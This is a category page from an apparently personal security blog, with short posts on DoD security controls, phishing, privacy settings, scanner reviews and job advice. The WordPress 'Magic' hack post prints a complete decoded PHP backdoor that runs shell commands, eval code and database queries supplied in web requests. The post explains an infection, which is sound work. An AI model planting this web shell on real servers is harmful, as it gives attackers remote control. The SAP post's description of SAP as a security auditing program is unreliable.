Category: security

  • SAP security audit programs

    SAP- Increasing Demand by Increasing Efficiency

    Systems, applications, Products (SAP) is a security auditing program that checks a computer systems data integrity and overall security. This application is accompanied by a user interface that is highly flexible. SAP security audit programs were introduced in the 1980s and provides the best audit resources for major companies and industry leaders.

    In SAP, audit security is the foremost requirement enabling access control and separation of duties. These two areas are very important for the integration of control mechanisms. A company must plan prior to implementing SAP to obtain better access and a clear understanding of the system. This includes proper design of profile and removal of surplus IDs. Security audit programs includes many audit procedures that are designed to efficiently access a variety of transactions.

    The main administrative function of SAP security Audit Programs includes automatic scheduling of jobs according to different user IDs, monitoring errors, administering backdrop session and access to proper management functionality. As far as security settings are concerned, SAP system audit program helps to execute online programs using different procedures and maintenance of different tables. This allows access to maintain different profile parameters including password and security of default user IDs. SAP system audit programs also allow locking of sensitive codes of transactions and execution of OS commands externally.

    The SAP system audit program contains different audit procedures showing steps to extract useful information from a system. Some system audit program resources are highly beneficial and include audit programs for financial accounting, audit programs for basic security, audit programs for Fixed Asset, audit programs for expenditures, audit programs for treasury, audit programs for inventory management, audit programs for HR & payroll and audit programs for revenue. Companies using SAP applications can create different software packages to meet their key objectives. This application is assembled in such a way that allows each department of an organization to get integrated.

  • iPad Security Hole

    ipad security hole
    ipad security hole
    This list of government emails is why the Department of Defense does not usually implement bleeding edge information technologies into operational environments. These DoD emails were taken from an iPad prototype and lists early adopters of the system. The iPad and AT&T had a gapping security hole dealing with Safari. The vulnerability allowed gray hat hackers the ability to harvest the e-mail addresses that iPad 3G buyers provided to activate their device.

    My job as the resident “security guy” places me at the butt of jokes that serve as the passive aggressive means of venting the frustration that my co-workers feel about the strict military and DoD policies. Security is almost never appreciated until an information system’s security is broken or breached. And even then solutions only come after blame and public humiliation.

    Why did so many important government figures decide to risk using the new iPad without proper military grade testing and scrutiny is the biggest question. I would expect a start up in Silicon Valley to grab an iPad the first day it comes out but not U.S. military organization in the middle of two wars.

    more here:
    http://money.cnn.com/2010/06/09/technology/iPad_email_breach/index.htm?postversion=2010061009
    http://gawker.com/5559346/apples-worst-security-breach-114000-ipad-owners-exposed

  • facebook privacy

    Privacy is really important but unfortunately the default setting of Facebook and other social networks is to push out all posts, links, and media content out to everyone on your “friends” and sometimes even “friends of friends”. The problem with this is that not everyone on your “friends list” are friends. Some maybe immediate family, distant family, co-workers and while others are complete strangers.

    There maybe parts of your life you want to share with family that you don’t want co-workers on your friends list to see.

    With Facebook you can manage all the content that you post by creating Lists. Once the list is created you can control who has access to what you post and upload.

    How to Create Facebook Friends Lists:
    1) Login and go to Account | Edit Friends
    2) Click on “Create New List” and make a name for your new list
    3) Once you have your new list you can add people to that list

    Limiting Access to Content:
    Anytime you post content you will be given the option of permitting or deny certain lists of friends (or even individuals) to what you are posting. At the bottom of every post near the “Share” button, there is a lock with an arrow to a drop down featuring: Everyone, Friends of Friends, Friends, and Custom. If you click Custom, it will allow you to choose the new list you created or even specific individuals.

    With this built in access control feature you have pretty good control over your privacy.

  • Evil Plug-ins

    I love plug-ins! I love them on Firefox, WordPress, Dreamweaver and now on Chrome. It has crossed my mind that some of these plug-ins could be created and distributed by very smart people with criminal or mischievous intent. But the reality of bad plug-ins didn’t hit me until I noticed a link on digg.com about Stealing Logins using Google Chrome Extensions. I am no programmer but understand enough to see how cleaver it is.

    Basically, someone creates a innocent looking extension or plug-in, they distribute it and the innocent looking plug-in/extension sends your personal information to where ever.

    How can a person avoid this?! I guess the safest way would be to not use ANY plug-ins and extensions.. but that is over kill.
    I know that I am pretty paranoid about WordPress extensions/plug-ins but the open source community is pretty good about peer reviewing, testing and reviewing some of the more popular plug-ins. When it comes to software I depend heavily on reviews of others who have used the product. If there are no reviews (even on forums or dev/plug-in sites), I usually consider the app to risky.

    Sometimes what I do is try the app/extension/plug-in on a site/blog I don’t care as much about. In the case of browser plug-ins, I use a single trusted browser with minimal plug-ins to do important sensitive/personal transactions. Most of the stuff I do on the web does not require so much scrutiny.

    Unfortunately, there is always a risk with plug-ins, apps, and extensions. All we can really do is manage the risk, by being careful and suspicious.

    Thanks Mr. Grech for the knowledge.

  • Find an IT Security Jobs

    So do you have any suggestions for someone starting out in IT Security? What certifications, knowledge, training, forums, do you suggest? They will pay for the A+ cert, Network + and Security + certification. Do you have any suggestions for someone just starting out in security? After CompTia what should I focus on. Although I’m not sure yet of my final career goals, I’d like to first get a job very quickly in IT security, hopefully with the government, state, or any local government; when I say quick I mean within the next few weeks Thanks Rob for whatever info you can suggest

    Hello,

    If you want a job fast I would suggest checking out simplyhired.com. I would also put my resume out on Monster.com, if you have not already done so. If you want a security job the security+ is the way to go, but also consider doing a search on monster and simplyhired to look at the skills and certifications that employers are looking for. Pay particular attension to keywords and phrases that they are using. You will know the keywords/phrase because they are repeated in nearly every resume for your chosen career path and/or job title.

    How I get Jobs Fast
    For example, in my career “system security engineer” and “information security officer” I see the following keywords/phrases over and over: security clearance, cissp, 8500, diacap. If noticed that when I have these keywords on my resume, I get calls almost DAILY from all over the US. Here is how you can do the same:
    1) Find a good job title that fits what you do or what you want to do
    2) Do a search for that job title [use google, simplyhired.com, monster.com, dice.com or any other search engine/job database]
    – Read through the job results and try to find keywords/phrases that seem to be in most or all of the jobs listed
    3) Try to get as many of the applicable keywords/phrases in your resume
    – Either have the skills required for the chosen job title or begin working toward them
    – I am not suggesting that you put lies on your resume, you’ll have to look for job titles that you have experience & skills in
    – Don’t mess with stuff that completely out of your league or level of expertise, be honest on your resume
    – Sometimes employers will take you if you are willing to learn the skills or earn the require certification/degree in a certain time frame. Put that on your resume.
    4) Put your resume [with keywords/phrases in place] online, as many places as you can

    Research Employer Demand in certain locations
    I am from California and I have been trying for years to find a decent job (for what I do) there. They’ve got them in southern California but almost none in Northern. California seems to be lacking jobs and then they don’t want to pay comparable to the cost of living there. I noticed that Cali has a LOT of networking jobs. If you type in CCNP in simplyhired.com for Cali, you’ll find a lot of good paying jobs. The problem is that CCNP is a very difficult certification to get (or so I’ve heard).

    I would recommend checking out what sort of IT skills employers are looking for in the area you want to work. For example, even though I have lots of certifications, most of the ones that I have [that are still active lol] won’t help me for moving back to Northern California. I researched it and found that they are mostly looking for Network Engineers [as of 2006-2010] and my Cisco routing and switching skills are still developing.

    Play Capitalisms Game: Start a Business
    Another option is to start your own business. This may sound daunting, but believe it or not my website elamb.org qualifies as a business. It took me about 1 year to get it making money, but now it makes between $400 – 800/month without me even looking at it. It has made as much as 2k and I know people who make more in a month then many people make in a year with their blogs. It is becoming harder and harder to be an employee. Companies do the bare minimum to take care of employees, the economy goes in a recession (or worse) and hard working people can not find a job and the value of the dollar flutuates on a downward spiral. It seems the only way to be comfortable in this new “capitalism” is to have multiple streams of income.

    If you are interested, start at your states business page and here

    Thanks,
    Rob E.

  • Facebook Imposter Scam

    The first time I saw the “impostor scam” was on myspace. One after another about 6 or 7 of my friends myspace accounts were hijacked. What followed was my friends sending me messages about viagra and bogus malware sites. It was obvious that they’d been hacked, but they usually catch it a few days later and send out a message to apologize to everyone. It seems not social network is exempt from the imposter scam.

    Enter the Facebook Imposter Scam:
    The Facebook Imposter Scam is the same exploit that hit myspace. Users accounts are hacked using phishing techniques. Basically, users are lured into clicking on what looks like a legitimate link, they are scammed into giving out their username and password (sometimes with a phishing site that looks like “facebook” a “facebook imposter”). Once the user enters the username password, the criminal has there information and can do whatever they want. What they typically do is use the account to advertise a product, service or scam to EVERY friend on the victims list. The facebook imposter will even use the victim’s account to scam others.

    This scam earned its way on the Internet Crime Complaint Center.

    The best way to avoid falling prey to this imposter scam, is to watch out for outbound links. Always hover over alink and look at the bottom right-hand corner of the browser to see where it is actually going. Type in the supposed link into the address bar rather than clicking on outboud links. Pay attention to phishing warnings that myspace, search engines, browsers and facebook give you.

  • SRR Findings to IA Controls

    From Reader:

    I stumbled upon your site and am new to security working for a contractor. I’m attempting to complete a DIACAP POA&M and need to map SRR findings to IA controls – any idea where I might find this information?

    The SRR finding reference the DOD Unix STIG and NIPR STIG. It doesn’t seem to completely match up the the DIACAP IA Controls, but that is where a good system security engineer/ IA analyst comes in.

    Once you’ve got your SRR results, IA Control compliance and mitigation depends on your situation. There are a few that map directly (like Screen Saver) but most of the SRR findings will fall under one or two of the IA Controls.

    Hope this helps.

  • Server at Magic Requires Username Password

    The WordPress “Magic” hack!

    If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

    Wordpress Magic Attack
    Wordpress Magic Attack

    WordPress user Yokima reported this very slick hack.

    FIX ACTION:
    And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

    *Similar issues reported by techartistserver BLAH.fuzz.com at Fuzz Access requires a username and password.”

    What the infected code looks like after the malware injection into your blog.. yep.. uuugly!

    From RocketWood:
    We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

    {

    if (!function_exists('______safeshell'))

    {

    function ______safeshell($komut) {

    @ini_restore("safe_mode");

    @ini_restore("open_basedir");

    $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));

    if (!empty ($komut)) {

    if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {

    //@ ob_start();

    @ passthru($komut);

    //$res = @ ob_get_contents();

    //@ ob_end_clean();

    }

    elseif (function_exists('system') && !in_array('system', $disable_functions)) {

    //@ ob_start();

    @ system($komut);

    //$res = @ ob_get_contents();

    //@ ob_end_clean();

    }

    elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {

    $res = @ shell_exec($komut);

    echo $res;

    }

    elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {

    @ exec($komut, $res);

    $res = join("\n", $res);

    echo $res, "\n";

    }

    elseif (@ is_resource($f = @ popen($komut, "r"))) {

    //$res = "";

    while (!@ feof($f)) {

    //$res .= @ fread($f, 1024);

    echo(@ fread($f, 1024));

    }

    @ pclose($f);

    }

    else

    {

    $res = {$komut};

    echo $res;

    }

    }

    }

    };

    if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {

    echo "\n";

    if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {

    eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

    }

    else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {

    ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);

    }

    else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {

    $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);

    if (!$result)

    {

    echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";

    die();

    }

    else if (is_resource($result))

    {

    $res = array();

    while ($row = mysql_fetch_assoc($result))

    {

    $res[] = $row;

    };

    mysql_free_result($result);

    echo serialize($res);

    die();

    }

    else

    {

    echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";

    die();

    }

    };

    echo "\n\n";

    die();

    };

    };

    p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

  • GFI LANGuard – Review

    GFI Languard Network and Security Scanner

    I was given the honor of reviewing GFI LANguard network and security scanner. Right off the bat I notice that the interface is very intuitive & easy to use, which is important to a busy security professional that have better things to do with their time than fight with a messy
    security tool.

    The network scanning tool I normally use is called Retina.
    When lining the two up, I have to say Retina is much more powerful, with many more options built in. It can drill way down and do intrusive scans where GFI LANguard v.9 is pretty vanilla. It gives you what you need and that is it.

    The simplicity could be an advantage to a system admin doing a security job, because it really is straight to the point. The cost is definitely and advantage. GFI LANguard is about ½ the cost of the Retina Scan tool.

    Retina Professional Edition 16 IP Pack – $995.00

    GFI LAN Guard goes for about 300+ for 10 licences.

    Nessus is considered one of the best network scan tools but its more expensive then both.

    What I really like about Retina is that it allows you to scan in accordance with Department of Defense standards, SAN, and others. Languard does look at the SANS Top 20 report vulnerabilities.

    If your looking for basic, down to Earth network & security scanner for your small to medium business needs, than GFI Languard is definitely the way to go because you will not beat the cost for the quality and support you get. Its going to give you a thorough assessment of the your systems and even tell you how to fix them. Buy this product!

  • CNSSI 12-53: New Security Control Catalog for National Security Systems

    2014 – Update, DIACAP has been upgraded to Risk Management Framework for DoD IT (aka DIARMF).  Its base on the NIST SP 800-37, Risk Management Framework for Federal IT and takes from CNSSI 1253.

    Risk Management Framework for DoD IT takes all IA Controls (Security Controls) from NIST SP 800-53.

    New DIACAP Certification & Accreditation IA Controls

    The DoD has had the same IA controls since DoD 8510.1-M, controls since DoD 8510.1-M, Department of Defense Information Technology System Certification & Accreditation Process (DITSCAP), July 31, 2000 – it was developed late last century.

    The DoD has a total of 157 IA controls spread across 8 subject areas in 4 classes:

    DC – Security Design & Configuration

    IA – Identification and Authentication

    EC – Enclave & Computing

    EB – Enclave Boundary Defense

    PE – Physical & Environmental

    PR – Personnel

    CO – Continuity

    VI – Vulnerability

    There is a huge change coming in certification & accreditation for the DoD coming. The IA controls are being expanded and changed. The last two DIACAP classes I’ve been to mentioned that there is a big change coming. Essentially, all the IA Controls (security controls, safeguards, countermeasures.. whatever your organization is calling them) are getting expanded. All federal organizations will have security controls that look more like what is in the National Institute of Standards and Technology Special Publication 800-53. This is all being placed in the Committee on National Security Systems Instruction (CNSSI) 1253. As of 25 June 2009, the CNSSI 1253 is still in draft.

    The draft has 17 families & identifiers in three security control classes.

    TABLE 1: SECURITY CONTROL CLASSES, FAMILIES, AND IDENTIFIERS
    IDENTIFIER FAMILY CLASS

    AC Access Control Technical

    AT Awareness and Training Operational

    AU Audit and Accountability Technical

    CA Certification, Accreditation, and Security Assessments Management

    CM Configuration Management Operational

    CP Contingency Planning Operational

    IA Identification and Authentication Technical

    IR Incident Response Operational

    MA Maintenance Operational

    MP Media Protection Operational

    PE Physical and Environmental Protection Operational

    PL Planning Management

    PS Personnel Security Operational

    RA Risk Assessment Management

    SA System and Services Acquisition Management

    SC System and Communications Protection Technical

    The CNSSI has about 500 controls with pretty good granularity.

    One of the really cool thing about 1253 was the security control mapping. It’s a table that matches up 800-53, DCID 6/3 and DODI 8500.2.